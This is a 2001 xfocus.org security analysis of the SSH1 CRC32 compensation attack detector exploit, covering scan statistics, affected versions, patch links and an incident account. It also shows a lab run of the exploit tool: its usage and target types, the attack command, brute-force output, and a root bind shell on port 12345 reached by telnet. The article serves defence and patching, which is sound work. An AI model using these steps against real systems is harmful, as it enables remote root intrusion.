[Analysis] Analysis of SSH CRC32 Compensation Attack Detector Exploit


Creation time: 2001-11-12

Article type: compilation

Submitted by: xundi (xundi_at_xfocus.org)

By xundi@xfocus.org

http://xfocus.org

2001/11/10

Since the SSH CRC32 Compensation Attack Detector exploit code began circulating, SSH scanning has also increased steadily. Here is a statistical report:

 ------------ --------- ---------- ---------- -----------
| DATE       | #Probes | #Sources | #targets | #scanners |
 ------------ --------- ---------- ---------- -----------
| 2001-10-03 |    1466 |       45 |      987 |           |
| 2001-10-04 |     319 |       25 |      212 |           |
| 2001-10-05 |     825 |       22 |      783 |           |
| 2001-10-06 |   86552 |       27 |    86305 |           |
| 2001-10-07 |    7564 |       29 |     7429 |           |
| 2001-10-08 |    2506 |       29 |     2449 |           |
| 2001-10-09 |    1010 |       18 |      263 |           |
| 2001-10-10 |     480 |       39 |      307 |           |
| 2001-10-11 |     978 |       31 |      504 |           |
| 2001-10-12 |     436 |       21 |      311 |           |
| 2001-10-13 |    6731 |       27 |     6353 |           |
| 2001-10-14 |    1411 |       29 |     1084 |           |
| 2001-10-15 |     936 |       34 |      723 |           |
| 2001-10-16 |    1358 |       40 |     1256 |           |
| 2001-10-17 |    1098 |       36 |      899 |           |
| 2001-10-18 |    1779 |       31 |     1438 |           |
| 2001-10-19 |   19722 |       28 |    19573 |         7 |
| 2001-10-20 |   25539 |       21 |    25419 |         3 |
| 2001-10-21 |    6796 |       26 |     6750 |         9 |
| 2001-10-22 |     807 |       30 |      482 |         5 |
| 2001-10-23 |     578 |       49 |      327 |         6 |
| 2001-10-24 |    2198 |       39 |     2025 |         9 |
| 2001-10-25 |    2368 |       31 |     1759 |         6 |
| 2001-10-26 |     712 |       37 |      591 |         7 |
| 2001-10-27 |     463 |       30 |      297 |         8 |
| 2001-10-28 |     495 |       30 |      263 |         5 |
| 2001-10-29 |     478 |       37 |      399 |         5 |
| 2001-10-30 |    1154 |       48 |     1051 |         5 |
| 2001-10-31 |    1998 |       46 |     1047 |         5 |
| 2001-11-01 |   66660 |       46 |    66386 |         5 |
| 2001-11-02 |    1514 |       40 |      926 |         5 |
| 2001-11-03 |    2142 |       36 |     2047 |         8 |
| 2001-11-04 |    1233 |       26 |      781 |         9 |
 ------------ --------- ---------- ---------- -----------

In view of this, I have compiled David A. Dittrich's article (http://staff.washington.edu/dittrich/misc/ssh-analysis.txt) for your reference and for patching.

-------------------------------------------------------------------------------

Overview

==================

This vulnerability was first published on BugTraq at SecurityFocus.com by Core SDI, in advisory CORE-20010207 dated February 8, 2001:

http://www.securityfocus.com/advisories/3088

Briefly, the vulnerability is an integer overflow in a piece of code included in the SSH1 daemon. The problem is in deattack.c, code developed by Core SDI to protect the SSH1 protocol against CRC32 compensation attacks. Because the detect_attack() function uses a 16-bit variable where a 32-bit value is needed, the hash table index overflows.

This allows an attacker to overwrite memory at arbitrary locations, and a remote attacker may obtain root privileges.
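To make the overflow concrete, here is an added model of how the detector sizes its hash table (my illustration, not code from this article, from Core SDI or from any SSH release). The constants are taken from deattack.c as I recall them and are assumptions here; the block limit in the hardened version is my own choice, not a vendor value.

```python
"""Model of the hash-table sizing in detect_attack() (deattack.c).

Added illustration, not code from the article or from any SSH release.
Assumed constants (from deattack.c as published; verify against your own
copy): SSH_BLOCKSIZE=8, HASH_MINSIZE=8192, HASH_ENTRYSIZE=2,
HASH_FACTOR(x) = x*3/2.
"""

SSH_BLOCKSIZE = 8                                   # SSH1 cipher block size, bytes
HASH_MINSIZE = 8192                                 # minimum table size, bytes
HASH_ENTRYSIZE = 2                                  # one 16-bit block index per entry
HASH_MINENTRIES = HASH_MINSIZE // HASH_ENTRYSIZE    # 4096 entries


def hash_factor(blocks: int) -> int:
    """HASH_FACTOR(x): the table must hold 1.5x the packet's block count."""
    return blocks * 3 // 2


def table_entries_needed(packet_len: int) -> int:
    """Grow the entry count by 4x until the packet's blocks fit.

    This is the 32-bit working value 'l' that detect_attack() computes.
    """
    l = HASH_MINENTRIES
    while l < hash_factor(packet_len // SSH_BLOCKSIZE):
        l <<= 2
    return l


def table_entries_vulnerable(packet_len: int) -> int:
    """Unpatched behaviour: 'l' is copied into a 16-bit 'n'.

    For packets of roughly 87 KB or more 'l' reaches 65536, which is 0
    once truncated to 16 bits, so the table is allocated with 0 entries.
    """
    return table_entries_needed(packet_len) & 0xFFFF


def index_mask_vulnerable(packet_len: int) -> int:
    """The detector indexes the table with HASH(block) & (n - 1).

    With n == 0 the mask (n - 1) is -1, i.e. all bits set, so the raw
    32-bit hash value is used as the index and block numbers are written
    far outside the allocation: the arbitrary-memory write the advisory
    describes.  Returned as an unsigned 32-bit value.
    """
    n = table_entries_vulnerable(packet_len)
    return (n - 1) & 0xFFFFFFFF


def table_entries_fixed(packet_len: int, max_blocks: int = 1 << 15) -> int:
    """Hardened form: keep the size in a full-width integer and reject
    oversized packets before sizing the table.

    max_blocks (32768 blocks = 256 KB) is an assumed limit for this model.
    """
    blocks = packet_len // SSH_BLOCKSIZE
    if blocks > max_blocks:
        raise ValueError(f"{blocks} blocks exceeds the {max_blocks} block limit")
    return table_entries_needed(packet_len)     # never truncated


def fixed_rejects(packet_len: int) -> bool:
    """True if the hardened sizing refuses the packet."""
    try:
        table_entries_fixed(packet_len)
    except ValueError:
        return True
    return False
```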

Other organizations have also published analyses and recommendations for this SSH vulnerability, such as:

http://xforce.iss.net/alerts/advise100.php

http://razor.bindview.com/publish/advisories/adv_ssh1crc.html

http://www.securityfocus.com/bugid=2347

On October 21, 2001, Jay Dyson reported on the incidents@securityfocus.com mailing list that a great deal of information showed SSH servers being scanned across the RIPE network ranges:

http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&x=2001-11-02&mid=221998&threads=1

Then a NewsBytes.com story was brought up on the vuln-dev@securityfocus.com mailing list: some news reports said that people were willing to pay $1,000 to anyone who could provide this attack tool. There is also a rumor that attack code exists for Solaris 8/sparc systems running ssh.com 1.2.26-31. The well-known security site SecurityNewsportal.com was compromised through this vulnerability; the defacement is mirrored at:

http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

Recently TESO released a statement about this attack code, which you can read at:

http://www.team-tesso.org/sshd_statement.php

The affected SSH versions are:

SSH Communications Security SSH 2.x and 3.x (if SSH version 1 fallback is enabled)

SSH Communications Security SSH 1.2.23-1.2.31

F-Secure SSH versions prior to 1.3.11-2

OpenSSH versions prior to 2.3.0 (if SSH version 1 fallback is enabled)

OSSH 1.5.7

Vendors have provided patch information for their systems; see the following addresses:

http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

http://openssh.org/security.html

http://www.cisco.com/warp/public/707/ssh-multiple-pub.html

-------------------------------------------------------------------------------

Analysis of attack behavior

=====================

On October 6, 2001, an attacker coming from a Netherlands network block used the CRC32 Compensation Attack Detector exploit to break into a Red Hat Linux system on the UW network running OpenSSH 2.1.1. The vulnerability is described in CERT VU#945216:

http://www.kb.cert.org/vuls/id/945216

A series of operating system commands on the system were replaced with trojaned versions to provide future access and to clean all system logs. A second SSH server was run on the high port 39999/TCP. After the break-in, the system was used to scan networks outside UW for more systems running OpenSSH 2.1.1.

Analysis of the exploit program recovered from the compromised system:

The exploit is based on OpenSSH 2.2.0 source code (the compromised system ran 2.1.1), from which the CRC32 compensation attack detection function was ripped, but it targets OpenSSH 2.1.1; the exploit can also be used against SSH.com 1.2.31 (tests against other SSH protocol 1 implementations and versions were not completed).

The exploit targets the following systems:

Linux/x86 ssh.com 1.2.26-1.2.31 RHL

Linux/x86 OpenSSH 1.2.3 (maybe others)

Linux/x86 OpenSSH 2.2.0p1 (maybe others)

FreeBSD 4.x, ssh.com 1.2.26-1.2.31 RHL

Although the exploit can attack several platforms, the attacker only scanned for port 22/TCP, then connected to those systems to obtain the daemon's version banner, and only continued against "OpenSSH_2.1.1". The scans used a fast SYN scanner and tools from the t0rn rootkit.

Analysis of the compromised system found that 47,067 addresses had been scanned; of these, 1,244 hosts were identified as vulnerable, and the attacker successfully used the vulnerability to break into 4 of them on August 8.

This exploit does not work against systems that use access controls (e.g. the "AllowHosts" or "DenyHosts" settings in ssh.com) or packet filtering (e.g. ipchains, iptables, ipf), because these block the public key exchange that the exploit requires.

-------------------------------------------------------------------------------

Analysis of real-time on attacker code

============================

The exploit was tested on an isolated network segment using the address range 10.10.10.0/24; the attacking host was 10.10.10.10 and the vulnerable server host was 10.10.10.3.

The vulnerable server system ran SSH.com version 1.2.31 on Red Hat Linux 6.0 (kernel 2.2.16-3 on an i586).

The attacking host ran Fred Cohen's PLAC [1] (a Linux 2.4.5 system booted from CD-ROM), with the files copied onto it using netcat [2].

Attacker side

=========================

Usage information shown when the exploit is run without any parameters:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh
linux/x86 sshd1 exploit by zip/teso (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src
Greets: Mray, Random, Big T, Sh1fty, Scut, DVORAK
PS. this sploit already OWNED CIA.GOV :/
** please pick a type **
Usage: ./ssh host [options]
Options:
  -p port
  -b base    base address to start bruteforcing distance, by default 0x1800,
             goes as high as 0x10000
  -t type
  -d         debug mode
  -o         add this to delta_min
Types:
  0: Linux/x86 ssh.com 1.2.26-1.2.31 RHL
  1: Linux/x86 OpenSSH 1.2.3 (maybe others)
  2: Linux/x86 OpenSSH 2.2.0p1 (maybe others)
  3: FreeBSD 4.x, ssh.com 1.2.26-1.2.31 RHL
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The test system ran the SSH.com version 1.2.31 (unpatched) daemon on port 2222 and redirected its syslog output to a separate file, sshdx.log. Here type 0 and attack port 2222 were selected:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
linux/x86 sshd1 exploit by zip/teso (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src
Greets: Mray, Random, Big T, Sh1fty, Scut, DVORAK
PS. this sploit already OWNED CIA.GOV :/
.........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
............^[[a................|!
bruteforced h->ident buff distance: 5bfbed88
trying retloc_delta: 35
....!
found high words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

At this point the exploit appears to "stop" (hang). Going back to the test system to look, we find that a new port has been opened.

Victim test system side

=========================

Before the exploit was run, the test system showed the standard SSH daemon listening on port 22/TCP and the daemon under test listening on port 2222/TCP, with the standard SSH daemon holding one external connection (10.10.10.2:33354), as seen with netstat:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

After the exploit "stopped", netstat on the test system shows the following listening state:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:2222         10.10.10.10:32965       ESTABLISHED
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

A new service is found listening on port 12345/TCP.

Viewing the network status again with netstat shows that the program attacks by brute-force address guessing, with one connection per attempt:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
tcp        0      0 10.10.10.3:2222         10.10.10.10:33075       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33074       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33072       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33071       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33069       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33067       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33066       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33064       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33063       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33062       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33061       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33060       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33059       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33058       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33056       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33055       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33053       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33051       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33050       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33048       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33047       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33046       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33042       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33041       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33040       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33039       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33038       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33036       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33035       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33034       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33033       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33032       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33030       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33029       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33028       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33027       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33024       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33023       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33022       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33021       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33020       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33016       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33014       TIME_WAIT
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Using the List Open Files ("lsof") [4] tool on the SSH daemon under test shows that it has opened a new listening port:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
sshd    9364 root  cwd    DIR    3,3    1024      2 /
sshd    9364 root  rtd    DIR    3,3    1024      2 /
sshd    9364 root  txt    REG    3,3  655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd    9364 root  mem    REG    3,3  340771  30722 /lib/ld-2.1.3.so
sshd    9364 root  mem    REG    3,3  370141  31107 /lib/libnsl-2.1.3.so
sshd    9364 root  mem    REG    3,3   66231  31103 /lib/libcrypt-2.1.3.so
sshd    9364 root  mem    REG    3,3   47008  31113 /lib/libutil-2.1.3.so
sshd    9364 root  mem    REG    3,3 4101836  31102 /lib/libc-2.1.3.so
sshd    9364 root  mem    REG    3,3  246652  31109 /lib/libnss_files-2.1.3.so
sshd    9364 root  mem    REG    3,3  252234  31111 /lib/libnss_nisplus-2.1.3.so
sshd    9364 root  mem    REG    3,3  255963  31110 /lib/libnss_nis-2.1.3.so
sshd    9364 root  mem    REG    3,3   67580  31108 /lib/libnss_dns-2.1.3.so
sshd    9364 root  mem    REG    3,3  169720  31112 /lib/libresolv-2.1.3.so
sshd    9364 root    0u   CHR    1,3            4110 /dev/null
sshd    9364 root    1u   CHR    1,3            4110 /dev/null
sshd    9364 root    2u   CHR    1,3            4110 /dev/null
sshd    9364 root    3u  inet  10202             TCP *:12345 (LISTEN)
sshd    9364 root    4u  inet  10197             TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Clearly, the exploit successfully used the vulnerability to obtain a root shell and bound it to a high TCP port. An attacker can then connect to this port with any "telnet" or "nc" tool and run arbitrary commands as the superuser, as shown below:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov  1 18:04:42 PST 2001
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:12345        10.10.10.10:33077       ESTABLISHED
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[Note]: With telnet, each command must be followed by ";"; this is not needed over an nc connection.

After the attacker exits, the system's network status returns to normal:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If syslog logging is enabled, the connections and the brute-force attempts are recorded (note that this is the test of SSH.com 1.2.31 on Red Hat Linux 6.0; OpenSSH's log messages and logging behaviour differ):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov  1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov  1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov  1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov  1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov  1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov  1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov  1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov  1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov  1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov  1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov  1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov  1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov  1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov  1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov  1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov  1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov  1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov  1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov  1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov  1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov  1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov  1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov  1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov  1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov  1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov  1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov  1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov  1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov  1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov  1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov  1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov  1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov  1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov  1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov  1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov  1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov  1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov  1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov  1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov  1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov  1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov  1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov  1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov  1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov  1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov  1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov  1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov  1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov  1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov  1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov  1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov  1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov  1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov  1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov  1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov  1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov  1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov  1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov  1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov  1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov  1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov  1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov  1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov  1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov  1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov  1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov  1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov  1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov  1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov  1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov  1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov  1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov  1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov  1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov  1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov  1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov  1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov  1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov  1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov  1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov  1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov  1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov  1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov  1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov  1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov  1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov  1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov  1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov  1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov  1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
